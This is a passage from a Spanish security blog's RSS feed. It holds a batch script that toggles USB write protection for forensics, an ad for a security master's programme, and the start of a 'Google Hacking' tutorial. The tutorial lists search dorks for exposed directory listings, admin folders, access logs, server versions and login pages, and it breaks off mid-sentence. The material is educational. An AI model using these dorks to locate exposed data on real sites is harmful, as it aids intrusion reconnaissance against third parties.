pre;&quot;&gt;&amp;nbsp; &amp;nbsp; if exist &quot;%temp%\getadmin.vbs&quot; ( del &quot;%temp%\getadmin.vbs&quot; )&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&amp;nbsp; &amp;nbsp; pushd &quot;%CD%&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&amp;nbsp; &amp;nbsp; CD /D &quot;%~dp0&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:--------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:: Check if Key exist&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;reg query %key% &amp;gt;nul 2&amp;gt;&amp;amp;1&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;IF ERRORLEVEL 1 (&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;GOTO writeup&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:: Key exist and now we can verify Registry Value&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;FOR /F &quot;tokens=2*&quot; %%A IN (&#39;reg query %key% /v %value%&#39;) DO SET _base=%%B&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:: Verify is WriteProtect is Enable&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;if %_base%==0x1 (&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;GOTO writeoff&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;) else ( GOTO writeup )&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:writeup&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;reg add %key% /v %value% /t REG_DWORD /d 0x1 /f&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;mshta &quot;about:&amp;lt;script&amp;gt;alert(&#39;USB Write Protect is Enable !!!&#39;);close()&amp;lt;/script&amp;gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;GOTO:EOF&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:writeoff&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;reg add %key% /v %value% /t REG_DWORD /d 0x0 /f&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;mshta &quot;about:&amp;lt;script&amp;gt;alert(&#39;USB Write Protect is Disable !!!&#39;);close()&amp;lt;/script&amp;gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;GOTO:EOF&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;background-color: #f8eec7; font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;Get the Script // Check my GitHub:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;https://github.com/ST2Labs/DFIR&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;How works&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Windows control write protection on USB device through windows registry key:&lt;br /&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;br /&gt;SET key=&quot;HKLM\System\CurrentControlSet\Control\StorageDevicePolicies&quot;&lt;br /&gt;SET value=WriteProtect&lt;/blockquote&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Value 0 - Write Protection is disable&lt;br /&gt;Value 1 - Write Protection is enable.&lt;br /&gt;&lt;br /&gt;Remember, USB Device must be unplugged to make effect.&lt;br /&gt;&lt;br /&gt;#Windows #Forensics #DFIR #ST2Labs&lt;br /&gt;@seguridadxato2&lt;br /&gt;@st2labs&lt;br /&gt;@rhodius</description><link>http://www.seguridadparatodos.es/2015/10/windows-forensics-tips-usb-write.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-A2WJPZgNOTA/ViSqHkiT3uI/AAAAAAAAdvs/a5WdJnoqHMk/s72-c/Registro.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-8292506234162656117</guid><pubDate>Fri, 03 Jul 2015 18:25:00 +0000</pubDate><atom:updated>2015-07-03T20:25:44.853+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">2015</category><category domain="http://www.blogger.com/atom/ns#">2016</category><category domain="http://www.blogger.com/atom/ns#">3 Edición</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Labs</category><category domain="http://www.blogger.com/atom/ns#">Matriculación</category><category domain="http://www.blogger.com/atom/ns#">MSTIC</category><category domain="http://www.blogger.com/atom/ns#">Máster</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">Plazo</category><category domain="http://www.blogger.com/atom/ns#">Seguridad</category><category domain="http://www.blogger.com/atom/ns#">Sevilla</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">TIC</category><title>3Ed - Máster Seguridad TIC 15/16 - Abierto Plazo de Matriculación</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-5MrsDNYJYXw/VZbQmTiCf8I/AAAAAAAAds0/zy29SlRRhuo/s1600/3Ed-Master-head-Sevilla.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-5MrsDNYJYXw/VZbQmTiCf8I/AAAAAAAAds0/zy29SlRRhuo/s1600/3Ed-Master-head-Sevilla.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;! Cómo pasa el tiempo ¡ Ya ésta aquí la tercera edición del Máster Seguridad de la Comunicaciones y la Información (#MSTIC16) donde &lt;a href=&quot;http://about.me/rhodius&quot; target=&quot;_blank&quot;&gt;impartiré&lt;/a&gt; la clase práctica de Técnicas de Hacking y Pentesting, cómo &lt;b&gt;&lt;u&gt;novedad este año las 5 clases que impartiré serán totalmente en el laboratorio&lt;/u&gt;&lt;/b&gt;, con ejemplo y casos prácticos donde los alumnos se enfrentaran a casos reales, aprenderán a manejar las herramientas, interpretar los resultados y resolver problemas en entorno reales.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;No perdáis la oportunidad para completar vuestra formación con un Máster muy completo, con un fuerte carácter practico y orientación profesional.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Además solo hay 20 plazas, a un precio muy competitivo con posibilidad de pago aplazado !!! Todavía estas ahí ??? &lt;a href=&quot;http://www.cfp.us.es/cursos/mu/seguridad-en-la-informacion-y-las-comunicaciones/4594/&quot; target=&quot;_blank&quot;&gt;Matricúlate&lt;/a&gt; ya, y no pierdas más tiempo.!!!&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Si todavía necesitas más información, sigue leyendo.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;[ Información General ]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;background-color: white; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 13.3333330154419px; text-align: justify;&quot;&gt;El próximo curso académico la E.T.S. de Ingeniería de la Universidad de Sevilla lanzará la 3ª edición del Máster en Seguridad en las Tecnologías de la Información y las Comunicaciones.&lt;/div&gt;&lt;div style=&quot;background-color: white; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 13.3333330154419px; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background-color: white; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 13.3333330154419px;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: 13.3333330154419px;&quot;&gt;Este título de postgrado de 66 ECTS tiene un enfoque profesional, con clases semipresenciales donde más del 50% son prácticas, y 2/3 del temario es &lt;b&gt;impartido por los mejores especialistas de las empresas del sector&lt;/b&gt;.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: 13.3333330154419px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: 13.3333330154419px;&quot;&gt;En la próxima edición tan sólo se ofertarán 20 plazas, por lo que te animamos a que no dejes pasar esta oportunidad.&lt;/span&gt;&lt;span style=&quot;font-size: 13.3333330154419px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: 13.3333330154419px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: 13.3333330154419px;&quot;&gt;Si todavía &lt;b&gt;&lt;u&gt;no estas plenamente convencido&lt;/u&gt;&lt;/b&gt;, podrás obtener toda la información necesaria en :&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;background-color: white; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 13.3333330154419px;&quot;&gt;-&amp;nbsp;&lt;a href=&quot;http://trajano.us.es/seguridadtic&quot; style=&quot;color: #1155cc;&quot; target=&quot;_blank&quot;&gt;http://trajano.us.es/&lt;wbr&gt;&lt;/wbr&gt;seguridadtic&lt;/a&gt;&lt;br /&gt;-&amp;nbsp;&lt;a href=&quot;http://www.cfp.us.es/cursos/mu/seguridad-en-la-informacion-y-las-comunicaciones/4594/&quot; style=&quot;color: #1155cc;&quot; target=&quot;_blank&quot;&gt;http://www.cfp.us.es/cursos/&lt;wbr&gt;&lt;/wbr&gt;mu/seguridad-en-la-&lt;wbr&gt;&lt;/wbr&gt;informacion-y-las-&lt;wbr&gt;&lt;/wbr&gt;comunicaciones/4594/&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;background-color: white; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 13.3333330154419px;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background-color: white; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 13.3333330154419px;&quot;&gt;&lt;a href=&quot;http://www.st2labs.com/&quot;&gt;www.st2labs.com&lt;/a&gt; &lt;u&gt;Empresa Colaboradora del Máster.&lt;/u&gt; &lt;a href=&quot;https://www.twitter.com/rhodius&quot; target=&quot;_blank&quot;&gt;@rhodius&lt;/a&gt; imparte con clases presenciales las técnicas de Hacking y Pentesting.&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/07/3ed-master-seguridad-tic-1516-abierto.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-5MrsDNYJYXw/VZbQmTiCf8I/AAAAAAAAds0/zy29SlRRhuo/s72-c/3Ed-Master-head-Sevilla.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-6858557260243137244</guid><pubDate>Sat, 20 Jun 2015 17:13:00 +0000</pubDate><atom:updated>2015-06-20T19:13:49.975+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Fase</category><category domain="http://www.blogger.com/atom/ns#">Formación</category><category domain="http://www.blogger.com/atom/ns#">Google</category><category domain="http://www.blogger.com/atom/ns#">GooHS</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">OSINT</category><category domain="http://www.blogger.com/atom/ns#">Parte 2</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">Reconocimiento</category><category domain="http://www.blogger.com/atom/ns#">Web</category><title>Google Hacking Parte II</title><description>&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-losKW1qFbj8/VXqNUIz7VoI/AAAAAAAAdpk/JBb3WPNA16U/s1600/ST2_Google_Hacking_P2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-losKW1qFbj8/VXqNUIz7VoI/AAAAAAAAdpk/JBb3WPNA16U/s1600/ST2_Google_Hacking_P2.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b style=&quot;background-color: white; color: #666666; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 12px; line-height: 19.2000007629395px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;b style=&quot;background-color: white; color: #666666; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 12px; line-height: 19.2000007629395px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;GOOGLE HACKING: PARTE II&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b style=&quot;background-color: white; color: #666666; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 12px; line-height: 19.2000007629395px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Venimos de &lt;/span&gt;&lt;a href=&quot;http://www.seguridadparatodos.es/2013/07/google-hacking-parte-i.html&quot; style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Google Hacking I&lt;/a&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;, donde&amp;nbsp;habíamos&amp;nbsp;introducido los operadores que nos permiten exprimir al&amp;nbsp;máximo&amp;nbsp;este famoso buscador. Hoy veremos ejemplos sencillos de como&amp;nbsp;podemos utilizar estos operadores.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;b style=&quot;background-color: white; color: #666666; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 12px; line-height: 19.2000007629395px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div dir=&quot;ltr&quot; style=&quot;background-color: white; color: #666666; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 12px; line-height: 1; margin-bottom: 0pt; margin-top: 0pt;&quot;&gt;&lt;span style=&quot;font-family: Tahoma; font-size: 16px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;Listado de directorios&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Una de las acciones  habituales a la hora de mejorar la seguridad de un sitio web, es desactivar el listado de directorios, es decir, evitar que el servidor muestre la lista de contenidos de los directorios públicos. Aunque es habitual que esta opción este deshabilitada, existen muchos servidores que la traen activa por defecto, por lo que si no es desactivada nos ofrecería una oportunidad única para recopilar información de valor.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Localizar listados de directorios mediante búsquedas de Google es sencillo. Aprovecharemos la circunstancia de que la gran mayoría de listados de directorios comienzan con la frase “Index of”, frase que también se mostrará en el titulo de la pagina. Una forma rápida para encontrar este tipo de paginas vendrá dada por la búsqueda; &lt;/span&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;&lt;b&gt;intitle:index.of&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;, que buscara aquella paginas cuyo titulo sea “Index of”. Desafortunadamente, esta búsqueda devolverá multitud de falsos positivos, por lo que necesitaremos afinar un poco mas la búsqueda. Existen varias palabras claves que a menudo podemos encontrar en los listados de directorios, como son “parent directory”, “name” y “size”. Combinando estas palabras claves con la búsqueda anterior reduciremos drásticamente el numero de falsos positivos.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ intitle:index.of “parent directory” ]&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ intitle:index.of name size ]&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;&lt;b&gt;Buscando directorios y archivos &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Ya hemos visto como localizar un listado de directorios, pero aun podemos afinar mas la búsqueda. Una opción interesante seria buscar un directorio donde pudiéramos encontrar información útil. Por ejemplo, para localizar un directorio de nombre “admin” sin tener que navegar por el listado, añadiríamos a la búsqueda el nombre del directorio de la siguiente forma:&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ intitle:index.of.admin ]&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ intitle:index.of inurl:admin ]&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Pero el listado de directorios ademas de listar el nombre de los directorios, como su propio nombre indicia, también lista ficheros. Por tanto, es posible buscar mediante Google ficheros específicos sin necesidad de navegar por cada uno de los directorios. Por ejemplo, si pretendemos buscar ficheros de registro usaríamos la&amp;nbsp;búsqueda:&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ intitle:index.of acces.log ]&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;&lt;b&gt;Versión del servidor&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Una pieza de información valiosa que nos ofrecen algunos listados de directorios es el nombre y numero de la versión software del servidor. Suele aparecer en la parte baja del listado del directorio, tal como se muestra en la siguiente imagen.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Para localizar este tipo de información usaremos la palabra clave “server at”, que aparece junto a la versión y nombre del software del servidor web. Podremos también, buscar un tipo de servidor en concreto, como por ejemplo Apache o IIS, e incluso una versión determinada, para lo que cambiaríamos el asterisco por la versión concreta.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ intitle:index.of “server at” ]&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ intitle:index.of “Apache/* server at” ]&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ intitle:index.of “Microsoft-IIS/* server at” ]&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div dir=&quot;ltr&quot; style=&quot;background-color: white; color: #666666; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 12px; line-height: 1; margin-bottom: 0pt; margin-top: 0pt;&quot;&gt;&lt;span style=&quot;font-family: Tahoma; font-size: 16px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;Páginas de acceso&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Cuando hablamos de páginas de acceso, hacemos referencia a aquellas paginas web que permiten el acceso a una zona restringida mediante unos determinados credenciales (habitualmente usuario y contraseña). Encontrar este tipo de página puede sernos útil, ya que podremos obtener 